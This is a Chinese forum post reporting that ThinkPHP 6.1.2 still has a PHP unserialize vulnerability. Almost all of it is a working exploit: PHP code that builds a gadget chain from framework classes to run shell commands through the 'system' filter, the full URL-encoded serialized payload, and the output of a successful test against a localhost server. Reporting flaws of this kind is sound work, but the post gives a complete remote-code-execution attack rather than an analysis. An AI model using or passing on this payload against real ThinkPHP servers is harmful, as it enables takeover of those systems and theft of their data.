1. 首页
  2. 问答
  3. [top-think/think]6.1.2依然存在unserialize漏洞

[top-think/think]6.1.2依然存在unserialize漏洞

2023-12-11 693 views
0

  • 环境 php7.4-apache

  • 构造payload

    
<?php

namespace think { abstract class Model { private $lazySave = true; private $data = ['a' => 'b']; private $exists = true; protected $withEvent = false; protected $readonly = ['a']; protected $relationWrite; private $relation; private $origin = [];

    public function __construct($value)
    {
        $this->relation = ['r' => $this];
        $this->origin = ["n" => $value];
        $this->relationWrite = ['r' =>
            ["n" => $value]
        ];
    }
}

class App
{
    protected $request;
}

class Request
{
    protected $mergeParam = true;
    protected $param = ["echo $(pwd)"];
    protected $filter = "system";
}

}

namespace think\model {

use think\Model;

class Pivot extends Model
{
}

}

namespace think\route {

use think\App;

class Url
{
    protected $url = "";
    protected $domain = "domain";
    protected $route;
    protected $app;

    public function __construct($route)
    {
        $this->route = $route;
        $this->app = new App();
    }
}

}

namespace think\log { class Channel { protected $lazy = false; protected $logger; protected $log = [];

    public function __construct($logger)
    {
        $this->logger = $logger;
    }
}

}

namespace think\session { class Store { protected $data; protected $serialize = ["call_user_func"]; protected $id = "";

    public function __construct($data)
    {
        $this->data = [$data, "param"];
    }
}

}

namespace { $request = new think\Request(); // param $store = new think\session\Store($request); // save $channel = new think\log\Channel($store); // call $url = new think\route\Url($channel); // toString $model = new think\model\Pivot($url); // __destruct echo urlencode(serialize($model)), PHP_EOL; }



访问 [http://localhost:9000/public?payload=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A8%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A1%3A%22b%22%3B%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00readonly%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%22a%22%3B%7Ds%3A16%3A%22%00%2A%00relationWrite%22%3Ba%3A1%3A%7Bs%3A1%3A%22r%22%3Ba%3A1%3A%7Bs%3A1%3A%22n%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A6%3A%22domain%22%3Bs%3A8%3A%22%00%2A%00route%22%3BO%3A17%3A%22think%5Clog%5CChannel%22%3A3%3A%7Bs%3A7%3A%22%00%2A%00lazy%22%3Bb%3A0%3Bs%3A9%3A%22%00%2A%00logger%22%3BO%3A19%3A%22think%5Csession%5CStore%22%3A3%3A%7Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A13%3A%22think%5CRequest%22%3A3%3A%7Bs%3A13%3A%22%00%2A%00mergeParam%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00param%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A11%3A%22echo+%24%28pwd%29%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Di%3A1%3Bs%3A5%3A%22param%22%3B%7Ds%3A12%3A%22%00%2A%00serialize%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A14%3A%22call_user_func%22%3B%7Ds%3A5%3A%22%00%2A%00id%22%3Bs%3A0%3A%22%22%3B%7Ds%3A6%3A%22%00%2A%00log%22%3Ba%3A0%3A%7B%7D%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A9%3A%22think%5CApp%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00request%22%3BN%3B%7D%7D%7D%7Ds%3A21%3A%22%00think%5CModel%00relation%22%3Ba%3A1%3A%7Bs%3A1%3A%22r%22%3Br%3A1%3B%7Ds%3A19%3A%22%00think%5CModel%00origin%22%3Ba%3A1%3A%7Bs%3A1%3A%22n%22%3Br%3A11%3B%7D%7D](http://localhost:9000/public?payload=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A8%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A1%3A%22b%22%3B%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00readonly%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%22a%22%3B%7Ds%3A16%3A%22%00%2A%00relationWrite%22%3Ba%3A1%3A%7Bs%3A1%3A%22r%22%3Ba%3A1%3A%7Bs%3A1%3A%22n%22%3BO%3A15%3A%22think%5Croute%5CUrl%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00url%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22%00%2A%00domain%22%3Bs%3A6%3A%22domain%22%3Bs%3A8%3A%22%00%2A%00route%22%3BO%3A17%3A%22think%5Clog%5CChannel%22%3A3%3A%7Bs%3A7%3A%22%00%2A%00lazy%22%3Bb%3A0%3Bs%3A9%3A%22%00%2A%00logger%22%3BO%3A19%3A%22think%5Csession%5CStore%22%3A3%3A%7Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A13%3A%22think%5CRequest%22%3A3%3A%7Bs%3A13%3A%22%00%2A%00mergeParam%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00param%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A11%3A%22echo+%24%28pwd%29%22%3B%7Ds%3A9%3A%22%00%2A%00filter%22%3Bs%3A6%3A%22system%22%3B%7Di%3A1%3Bs%3A5%3A%22param%22%3B%7Ds%3A12%3A%22%00%2A%00serialize%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A14%3A%22call_user_func%22%3B%7Ds%3A5%3A%22%00%2A%00id%22%3Bs%3A0%3A%22%22%3B%7Ds%3A6%3A%22%00%2A%00log%22%3Ba%3A0%3A%7B%7D%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A9%3A%22think%5CApp%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00request%22%3BN%3B%7D%7D%7D%7Ds%3A21%3A%22%00think%5CModel%00relation%22%3Ba%3A1%3A%7Bs%3A1%3A%22r%22%3Br%3A1%3B%7Ds%3A19%3A%22%00think%5CModel%00origin%22%3Ba%3A1%3A%7Bs%3A1%3A%22n%22%3Br%3A11%3B%7D%7D)

返回
`/var/www/html/public`

he426100

回答

 相关问题